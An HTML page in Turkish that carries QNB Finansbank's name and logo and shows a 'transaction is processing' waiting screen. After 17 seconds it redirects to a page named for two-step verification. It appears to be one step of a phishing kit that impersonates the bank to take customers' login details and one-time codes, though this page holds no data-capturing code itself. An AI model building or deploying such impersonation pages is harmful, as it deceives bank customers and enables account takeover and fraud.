<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="utf-8">
    <title>QNB Finansbank Bekleme Sayfası</title>
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0">
    <link rel="stylesheet" href="css/FinansbankLoginStyle.css"> <!-- Mevcut stil dosyası -->
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }
        .header {
            background-color: #800d52;
            /* padding: 10px 20px; */
            display: flex;
            align-items: center;
            justify-content: space-between;
            color: #fff;
        }
        .header img {
            height: 50px;
        }
        .content {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            text-align: center;
        }
        .content img {
            width: flex;
            height: flex;
        }
        .content h1 {
            margin-top: 20px;
            font-size: 2.2em;
            color: #800d52;
        }
        .content p {
            margin-top: 10px;
            font-size: 1.4em;
            color: #333;
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="images/kusakli_mobile2x.png" alt="QNB Finansbank Logo"> <!-- Logo yolu -->
        <span>QNB Finansbank Bekleme Sayfası</span>
    </div>

    <div class="content">
        <img src="images/loader.gif" alt="Yükleniyor..."> <!-- Yükleme animasyonu -->
        <h1>İşleminiz gerçekleştiriliyor...</h1>
        <p>Lütfen birkaç saniye bekleyiniz.</p>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>

    <br>
    <br>
    <br>
    <br>
    </div>
</body>
<script>
    // 5 saniye sonra yönlendirme
    setTimeout(() => {
        window.location.href = "/2asamadogrula.html";
    }, 17000);
</script>
</html>
